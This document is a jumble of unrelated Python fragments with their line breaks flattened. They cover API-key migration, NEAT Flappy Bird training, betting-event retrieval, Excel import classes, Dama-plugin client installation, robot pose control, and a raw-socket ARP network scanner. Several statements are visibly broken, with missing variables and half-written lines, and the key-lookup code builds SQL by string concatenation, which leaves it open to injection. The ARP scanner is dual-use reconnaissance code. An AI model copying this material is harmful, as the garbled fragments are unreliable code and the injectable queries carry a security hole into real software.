self.logger.error(json.dumps(err.args)) return False for key in keys_to_restore: try: restored_key = self.base.create('key', key) # make sure the data is really restored, including "status" - that often gets # screwed up due to deleted keys counting against limits backup_key = self.get_service_key_from_backup( self.migration_environment.configuration['migration'] ['backup_location'], key) if (backup_key == None): backup_key = self.fetch_key(key) if (self.validator.validate_service_key( restored_key, backup_key) == False): self.base.update('key', backup_key) except ValueError as err: self.logger.error('Problem creating keys: %s', json.dumps(err.args)) return False return True def get_service_key_from_backup(self, backup_location, key): key_data = None try: f = open( backup_location + str(key['apikey']) + '_' + str(key['service_key']) + '.json', 'r') file_contents = key_data = json.loads(file_contents) f.close() except IOError as err: self.logger.error('Problem retrieving backup key: %s', json.dumps(err.args)) if (key_data == None or len(key_data) == 0): self.logger.error('Problem retrieving backup key: %s', json.dumps(err.args)) return None return key_data def fetch_key(self, key): key_data = None # fetch key data try: key_data = self.base.fetch( 'keys', '*, member, application, service, developer_class', 'WHERE apikey = \'' + key['apikey'] + '\' AND service_key = \'' + key['service_key'] + '\'') except ValueError as err: self.logger.error('Problem fetching key: %s', json.dumps(err.args)) return False if (len(key_data) == 1): key_data = key_data[0] else: self.logger.error('Problem fetching key for %s', json.dumps(key)) return key_data def fetch_application(self, application): application_data = None if (application['id'] != ''): try: # get the application from the database application_data = self.base.fetch( 'applications', '*, keys.*, keys.member, keys.service, keys.developer_class', 'WHERE id = ' + str(application['id'])) except ValueError as err: self.logger.error('Problem fetching application: %s', json.dumps(err.args)) if (len(application_data) == 1): application_data = application_data[0] else: self.logger.error('Problem fetching application for %s', json.dumps(application)) if (len(application['keys']) != len(application_data['keys'])): self.logger.error( 'Application data missing keys: json file: %s api return: %s', json.dumps(application), json.dumps(application_data)) return application_data
def __init__(self, rules = [], config = config.Config()): Base.__init__(self) self.persistent = 0
def evaluate_genomes(genomes, config): global GENERATION GENERATION += 1 score = 0 networks = [] current_genomes = [] birds = [] initialize_population_with_neural_networks(genomes, config, networks, birds, current_genomes) window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT)) pipes = [Pipe(700)] clock = pygame.time.Clock() run = True while run and len(birds) > 0: clock.tick(30) for event in pygame.event.get(): if event.type == pygame.QUIT: run = False pygame.quit() quit() pipe_index = 0 if len(birds) > 0: if more_than_1_pipes_and_bird_passed_the_first_pipe(birds, pipes): pipe_index = 1 # set to next pipe index for bird in birds: bird.move() output = get_output_from_neural_network(bird, pipes, pipe_index, networks, birds) if output[0] > 0.5: bird.jump() add_pipe = False pipe_to_remove = [] for pipe in pipes: for bird in birds: if pipe.collide(bird): remove_birds(current_genomes, birds, bird, networks) if bird_passed_pipe(bird, pipe): pipe.passed = True add_pipe = True score += 1 evaluate_genome(current_genomes) if pipe_passed_window(pipe): pipe_to_remove.append(pipe) pipe.move() add_new_pipe_if_bird_passed(add_pipe, pipes) remove_passed_pipes(pipe_to_remove, pipes) remove_overfly_or_fell_birds(birds, networks, current_genomes) base = Base(730) base.move() draw_window(window, birds, pipes, base, score, GENERATION)
from models import Storage, Event from base import Base # initialize mysql storage Storage().init_storage() # get events base = Base() operation = 'listEvents/' payload = '{"filter":{"eventTypeIds":["1"]}}' data = base.retrieve(operation, payload) # list of dicts events = [] for event in data: events.append(Event(event))
def __init__(self, cur, wb): Base.sheet_name = u'提示信息' Base.table_name = 'tipmessage' Base.__init__(self, cur, wb)
# -*- coding:utf-8 -*- from base import Base import win32com.client #调用大漠插件前需要把插件注册到系统 dm = win32com.client.Dispatch('dm.dmsoft') # 调用大漠插件 base_path = dm.GetBasePath() dm_ret = dm.SetPath(base_path) dm_ret = dm.SetDict(0, "ys.txt") app = Base() # 下载客户端 def download_client(url, path, filename): if app.search_file(filename): print('文件名:%s 已存在' % filename) else: print('找不到文件,开始下载%s' % filename), path, filename) app.wait(3) # 安装客户端 def install_teacher(path, softname, classname, path1): # 启动安装文件 app.launch(path, softname) app.wait(3) # 获取安装窗口句柄 hwnd = app.findwindow(classname) if hwnd > 0:
def __init__(self, cur, wb): Base.sheet_name = u'人物' Base.table_name = 'person' Base.__init__(self, cur, wb)
return "ff:ff:ff:ff:ff:ff" except KeyboardInterrupt: self.base.print_info("Exit") exit(0) # endregion # endregion # region Main function if __name__ == "__main__": # region Check user, platform and print banner Base = Base() Base.check_user() Base.check_platform() Base.print_banner() # endregion # region Parse script arguments parser = ArgumentParser(description='ARP scanner script') parser.add_argument('-i', '--interface', type=str, help='Set interface name for ARP scanner') parser.add_argument('-I', '--target_ip', type=str, help='Set target IP address',
def position_start_pose(self, offsets=None, do_something=False): """Assigns the robot's base to some starting pose. Mainly to "reset" the robot to the original starting position (and also, rotation about base axis) after it has moved, usually w/no offsets. Ugly workaround: we have target (x,y), and compute the distance to the point and the angle. We turn the Fetch according to that angle, and go forward. Finally, we do a second turn which corresponds to the target yaw at the end. This turns w.r.t. the current angle, so we undo the effect of the first turn. See `examples/` for tests. Args: offsets: a list of length 3, indicating offsets in the x, y, and yaws, respectively, to be added onto the starting pose. """ # Causing problems during my tests of the Siemens demo. if not do_something: return current_pos = copy.deepcopy(self.base.odom.position) current_theta = Base._yaw_from_quaternion(self.base.odom.orientation) # [-pi, pi] ss = np.array([current_pos.x, current_pos.y, current_theta]) # Absolute target position and orientation specified with `pp`. pp = np.copy(self.start_pose) if offsets: pp += np.array(offsets) # Get distance to travel, critically assumes `pp` is starting position. dist = np.sqrt( (ss[0]-pp[0])**2 + (ss[1]-pp[1])**2 ) rel_x = ss[0] - pp[0] rel_y = ss[1] - pp[1] assert -1 <= rel_x / dist <= 1 assert -1 <= rel_y / dist <= 1 # But we also need to be *facing* the correct direction, w/input [-1,1]. # First, get the opposite view (facing "outwards"), then flip by 180. desired_facing = np.arctan2(rel_y, rel_x) # [-pi, pi], facing outward desired_theta = math.pi + desired_facing # [0, 2*pi], flip by 180 if desired_theta > math.pi: desired_theta -= 2*math.pi # [-pi, pi] # Reconcile with the current theta. Got this by basically trial/error angle = desired_theta - current_theta # [-2*pi, 2*pi] if angle > math.pi: angle -= 2*math.pi elif angle < -math.pi: angle += 2*math.pi self.base.turn(angular_distance=angle, speed=self.TURN_SPEED) self.base.go_forward(distance=dist, speed=0.2) # Back at the start x, y, but now need to consider the _second_ turn. # The robot is facing at `desired_theta` rads, but wants `pp[2]` rads. final_angle = pp[2] - desired_theta if final_angle > math.pi: final_angle -= 2*math.pi elif final_angle < -math.pi: final_angle += 2*math.pi self.base.turn(angular_distance=final_angle, speed=self.TURN_SPEED)
class ArpScan: # region Set variables base = None eth = None arp = None rawSocket = None network_interface = None your_mac_address = None your_ip_address = None target_ip_address = None results = None unique_results = None mac_addresses = None mac_prefixes_file = None vendor_list = None retry_number = 0 timeout = 0 # endregion # region Init def __init__(self): from base import Base from network import Ethernet_raw, ARP_raw self.base = Base() self.eth = Ethernet_raw() self.arp = ARP_raw() self.rawSocket = socket(AF_PACKET, SOCK_RAW, htons(0x0003)) self.results = [] self.unique_results = [] self.mac_addresses = [] self.mac_prefixes_file = utils_path + "mac-prefixes.txt" self.vendor_list = [] self.retry_number = 3 self.timeout = 0 # endregion # region Sniffer def sniff(self): while True: packets = self.rawSocket.recvfrom(2048) for packet in packets: # Parse Ethernet header ethernet_header = packet[0:14] ethernet_header_dict = self.eth.parse_header(ethernet_header) # Success parse Ethernet header if ethernet_header_dict is not None: # 2054 - Type of ARP packet (0x0806) if ethernet_header_dict['type'] == 2054: # Destination MAC address is your MAC address if ethernet_header_dict[ 'destination'] == self.your_mac_address: # Parse ARP packet arp_header = packet[14:42] arp_header_dict = self.arp.parse_packet(arp_header) # Success parse ARP packet if arp_header_dict is not None: # ARP opcode == 2 (2 - ARP reply) if arp_header_dict['opcode'] == 2: # ARP target MAC address is your MAC address if arp_header_dict[ 'target-mac'] == self.your_mac_address: # ARP target IP address is your IP address if arp_header_dict[ 'target-ip'] == self.your_ip_address: # Parameter Target IP address is None if self.target_ip_address is None: self.results.append({ "mac-address": arp_header_dict[ 'sender-mac'], "ip-address": arp_header_dict[ 'sender-ip'] }) # Parameter Target IP address is Set else: if arp_header_dict[ 'sender-ip'] == self.target_ip_address: self.results.append({ "mac-address": arp_header_dict[ 'sender-mac'], "ip-address": arp_header_dict[ 'sender-ip'] }) # endregion # region Sender def send(self): arp_requests = [] self.your_mac_address = self.base.get_netiface_mac_address( self.network_interface) self.your_ip_address = self.base.get_netiface_ip_address( self.network_interface) first_ip_address = str( IPv4Address( unicode(self.base.get_netiface_first_ip( self.network_interface))) - 1) last_ip_address = str( IPv4Address( unicode(self.base.get_netiface_last_ip( self.network_interface))) + 1) if self.target_ip_address is not None: if self.base.ip_address_in_range(self.target_ip_address, first_ip_address, last_ip_address): first_ip_address = self.target_ip_address last_ip_address = self.target_ip_address else: self.base.print_error( "Bad target IP address: ", self.target_ip_address, "; Target IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) index = 0 while True: current_ip_address = str( IPv4Address(unicode(first_ip_address)) + index) index += 1 if IPv4Address(unicode(current_ip_address)) > IPv4Address( unicode(last_ip_address)): break else: arp_request = self.arp.make_request( ethernet_src_mac=self.your_mac_address, ethernet_dst_mac="ff:ff:ff:ff:ff:ff", sender_mac=self.your_mac_address, sender_ip=self.your_ip_address, target_mac="ff:ff:ff:ff:ff:ff", target_ip=current_ip_address) arp_requests.append(arp_request) SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((self.network_interface, 0)) for arp_request in arp_requests: if self.retry_number > 0: for i in range(self.retry_number): SOCK.send(arp_request) else: SOCK.send(arp_request) SOCK.close() # endregion # region Scanner def scan(self, network_interface, timeout=3, retry=3, target_ip_address=None, check_vendor=True): # region Set variables self.target_ip_address = target_ip_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run sniffer tm = ThreadManager(2) tm.add_task(self.sniff) # endregion # region Run sender self.send() # endregion # region Create vendor list if check_vendor: with open(self.mac_prefixes_file, 'r') as mac_prefixes_descriptor: for string in mac_prefixes_descriptor.readlines(): string_list = string.split(" ", 1) self.vendor_list.append({ "prefix": string_list[0], "vendor": string_list[1][:-1] }) # endregion # region Wait sleep(self.timeout) # endregion # region Unique results for index in range(len(self.results)): if self.results[index]['mac-address'] not in self.mac_addresses: self.unique_results.append(self.results[index]) self.mac_addresses.append(self.results[index]['mac-address']) # endregion # region Reset results and mac addresses list self.results = [] self.mac_addresses = [] # endregion # region Get vendors for result_index in range(len(self.unique_results)): # Get current MAC address prefix current_mac_prefix = self.eth.get_mac_prefix( self.unique_results[result_index]['mac-address']) # Search this prefix in vendor list for vendor_index in range(len(self.vendor_list)): if current_mac_prefix == self.vendor_list[vendor_index][ 'prefix']: self.unique_results[result_index][ 'vendor'] = self.vendor_list[vendor_index]['vendor'] break # Could not find this prefix in vendor list if 'vendor' not in self.unique_results[result_index].keys(): self.unique_results[result_index]['vendor'] = "Unknown vendor" # endregion # region Return results return self.unique_results # endregion # endregion # region Get MAC address def get_mac_address(self, network_interface, target_ip_address, timeout=5, retry=5): try: # region Set variables self.target_ip_address = target_ip_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run sniffer tm = ThreadManager(2) tm.add_task(self.sniff) # endregion # region Run sender self.send() # endregion # region Wait sleep(self.timeout) # endregion # region Return if 'mac-address' in self.results[0].keys(): return self.results[0]['mac-address'] else: return "ff:ff:ff:ff:ff:ff" # endregion except IndexError: return "ff:ff:ff:ff:ff:ff" except KeyboardInterrupt: self.base.print_info("Exit") exit(0)
def main(genomes, config): global GEN GEN += 1 networks = [] genomes_list = [] birds = [] for genome_id, genome in genomes: # set up an initial fitness of 0 for each genome (bird) = 0 # set up neural network for genome net = neat.nn.FeedForwardNetwork.create(genome, config) networks.append(net) birds.append(Bird(230, 350)) genomes_list.append(genome) base = Base(730) pipes = [Pipe(600)] win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT)) run = True clock = pygame.time.Clock() score = 0 while run: # 30 ticks every second clock.tick(30) for event in pygame.event.get(): if event.type == pygame.QUIT: run = False pygame.quit() quit() # look at the first pipe in the pipe list pipe_index = 0 if len(birds) > 0: # if the bird passed the first pipe in the list, look at the second pipe in the list if len(pipes) > 1 and birds[ 0].x_pos > pipes[0].x_pos + pipes[0].PIPE_TOP.get_width(): pipe_index = 1 else: run = False break for bird_index, bird in enumerate(birds): bird.move() genomes_list[bird_index].fitness += 0.1 output = networks[bird_index].activate( (bird.y_pos, abs(bird.y_pos - pipes[pipe_index].height), abs(bird.y_pos - pipes[pipe_index].bottom))) if output[0] > 0.5: bird.jump() remove_pipes = [] add_pipe = False for pipe in pipes: for bird_index, bird in enumerate(birds): if pipe.collide(bird): # subtract fitness from birds that possibly make it far but collide with the pipe genomes_list[bird_index].fitness -= 1 # remove that bird from the lists birds.pop(bird_index) networks.pop(bird_index) genomes_list.pop(bird_index) # if the bird has passed the pipe, change the bird passed variable to true and add the next pipe if not pipe.bird_passed and pipe.x_pos < bird.x_pos: pipe.bird_passed = True add_pipe = True # if the pipe is off the screen, add the pipe to the remove list if pipe.x_pos + pipe.PIPE_TOP.get_width() < 0: remove_pipes.append(pipe) pipe.move() # once the bird has passed the pipe, add to score and set up next set of pipes if add_pipe: score += 1 #if the bird makes it through the pipe, add to fitness to encourage it to want to go through the pipe for genome in genomes_list: += 5 pipes.append(Pipe(600)) # remove the pipes in the remove list from the pipes list for pipe in remove_pipes: pipes.remove(pipe) # if the bird hits the floor for bird_index, bird in enumerate(birds): if bird.y_pos + bird.img.get_height() >= 730 or bird.y_pos < 0: birds.pop(bird_index) networks.pop(bird_index) genomes_list.pop(bird_index) # once bird gets good enough, break out of loop if score > 50: break base.move() draw_window(win, birds, pipes, base, score, GEN)
def __init__(self): Base.__init__(self)